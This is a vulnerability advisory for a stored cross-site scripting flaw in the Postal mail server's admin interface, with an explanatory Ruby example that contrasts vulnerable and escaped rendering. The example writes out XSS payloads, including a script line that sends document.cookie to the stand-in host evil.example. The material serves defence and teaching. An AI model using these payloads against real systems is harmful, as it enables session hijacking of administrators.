CVE-2026-25529
Published: 12 March 2026
Summary
CVE-2026-25529 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Postalserver Postal. Its CVSS base score is 8.1 (High).
Operationally, exploitation is mapped to the MITRE ATT&CK technique Exploitation for Privilege Escalation (T1068). It sits at the 14.1 percentile by exploit likelihood (below the median) and is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2026-25529 is an HTML injection vulnerability (CWE-79) affecting Postal, an open source SMTP server, in versions prior to 3.3.5. The flaw allows unescaped data to be injected into the admin interface, primarily through the API's "send/raw" method. This enables arbitrary HTML insertion, which could alter the page's appearance in a misleading manner or facilitate unauthorized JavaScript execution. The vulnerability carries a CVSS v3.1 base score of 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N), indicating high severity due to network accessibility, low attack complexity, and significant impacts on confidentiality and integrity.
An attacker with low privileges, such as an authenticated API user with access to the "send/raw" endpoint, can plant the payload over the network without any interaction on the attacker's side; the injected markup then executes in the browser of whichever administrator later views the affected admin page. Successful exploitation injects malicious HTML or JavaScript into the admin interface, leading to stored cross-site scripting (XSS) that can steal session cookies, impersonate administrators, or manipulate interface elements to deceive users.
The official GitHub Security Advisory (GHSA-5f4r-5jpr-rfhc) confirms the issue was fixed in Postal version 3.3.5 and later, recommending immediate upgrades for affected installations. No additional workarounds are specified beyond applying the patch.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-11603
Vulnerability details
Postal is an open source SMTP server. Postal versions less than 3.3.5 had an HTML injection vulnerability that allowed unescaped data to be included in the admin interface. The primary way for unescaped data to be added is via the API's "send/raw" method. This could allow arbitrary HTML to be injected into the page which may modify the page in a misleading way or allow for unauthorised JavaScript to be executed. Fixed in 3.3.5 and higher.
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Stored XSS via HTML/JS injection in the admin interface directly enables browser session hijacking and theft of web session cookies for credential access, and from there privilege escalation by impersonating administrators.
Mitigating Controls (NIST 800-53 r5)
SI-15 (Information Output Filtering) directly prevents HTML injection by encoding or sanitizing untrusted data at the moment it is rendered into the admin interface. Encoding at the render site is the durable fix because it covers every path that feeds data into the page, not only send/raw.
SI-10 (Information Input Validation) enforces validation of API inputs such as send/raw. Its reach is limited for a mail server: a raw message legitimately carries HTML bodies and headers containing angle brackets, so rejecting or stripping markup at the API would break normal mail. Treat input validation as a secondary layer here; output encoding remains the necessary control.
SI-2 (Flaw Remediation) requires timely patching of vulnerabilities like CVE-2026-25529, as fixed in Postal 3.3.5, to eliminate the injection flaw.
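Added example in Ruby (Postal is a Rails application), illustrating the injection path described under Deeper analysis and the output-filtering control listed above. It is not Postal's code and does not reproduce the 3.3.5 fix. It assumes a send/raw request that carries the base64-encoded RFC 822 message under a `data` key and an admin page that renders the From and Subject headers into a table row; the request, the message, the header parser, both render functions, the markup-reflection check and the version check are all constructed for this example.

```ruby
require "base64"
require "erb"

# Constructed sample request to the send/raw API. The "data" key name is an
# assumption for this example; the message inside it is entirely caller-controlled.
RAW_MESSAGE = [
  'From: "Ops" <ops@example.test><img src=x onerror="alert(document.domain)">',
  'To: victim@example.test',
  # Folded header (continuation line starts with a space), to exercise unfolding.
  "Subject: Invoice <script>document.location='//evil.example/?c='",
  " +document.cookie</script>",
  'Content-Type: text/plain; charset=utf-8',
  '',
  'hello',
].join("\r\n")

API_REQUEST = {
  "mail_from" => "ops@example.test",
  "rcpt_to"   => ["victim@example.test"],
  "data"      => Base64.strict_encode64(RAW_MESSAGE),
}

# Minimal RFC 822 header parser: splits the header block from the body, unfolds
# continuation lines, and returns a lower-cased field name => value hash. Only
# the structure this example needs is handled (no MIME, no encoded words).
def parse_headers(raw)
  head, _body = raw.split(/\r?\n\r?\n/, 2)
  headers = {}
  last = nil
  head.to_s.split(/\r?\n/).each do |line|
    if line.match?(/\A[ \t]/) && last
      headers[last] << " " << line.strip
    elsif (m = line.match(/\A([!-9;-~]+):[ \t]*(.*)\z/))
      last = m[1].downcase
      headers[last] = m[2]
    end
  end
  headers
end

# Vulnerable rendering: header values are interpolated into HTML verbatim, so
# whatever the API caller put in the message lands in the admin's page as markup.
def render_message_row_vulnerable(headers)
  "<tr><td>#{headers['from']}</td><td>#{headers['subject']}</td></tr>"
end

# Hardened rendering (SI-15, output filtering): every untrusted value is
# HTML-escaped where it enters the page. ERB::Util.html_escape encodes
# & < > " and ', the same set Rails' helpers escape for non-html_safe strings.
def render_message_row_safe(headers)
  from    = ERB::Util.html_escape(headers["from"])
  subject = ERB::Util.html_escape(headers["subject"])
  "<tr><td>#{from}</td><td>#{subject}</td></tr>"
end

# Check usable in a view test: does any untrusted value containing '<' appear
# verbatim in the rendered fragment? True means the renderer leaks markup.
def reflects_untrusted_markup?(rendered, untrusted_values)
  untrusted_values.any? { |v| v.include?("<") && rendered.include?(v) }
end

# Version check against the advisory's fixed version: 3.3.5 and later are not affected.
def affected_version?(version)
  Gem::Version.new(version) < Gem::Version.new("3.3.5")
end

if __FILE__ == $PROGRAM_NAME
  headers = parse_headers(Base64.strict_decode64(API_REQUEST["data"]))
  puts "vulnerable: #{render_message_row_vulnerable(headers)}"
  puts "safe:       #{render_message_row_safe(headers)}"
  puts "leaks markup? vulnerable=#{reflects_untrusted_markup?(render_message_row_vulnerable(headers), headers.values)} " \
       "safe=#{reflects_untrusted_markup?(render_message_row_safe(headers), headers.values)}"
end
```

Run it with `ruby` and compare the two rows. The From header also shows why escaping is required even for benign mail: the address form `<ops@example.test>` is swallowed as a tag by the vulnerable renderer, which is exactly why input validation that rejects angle brackets is not a workable fix for a mail server.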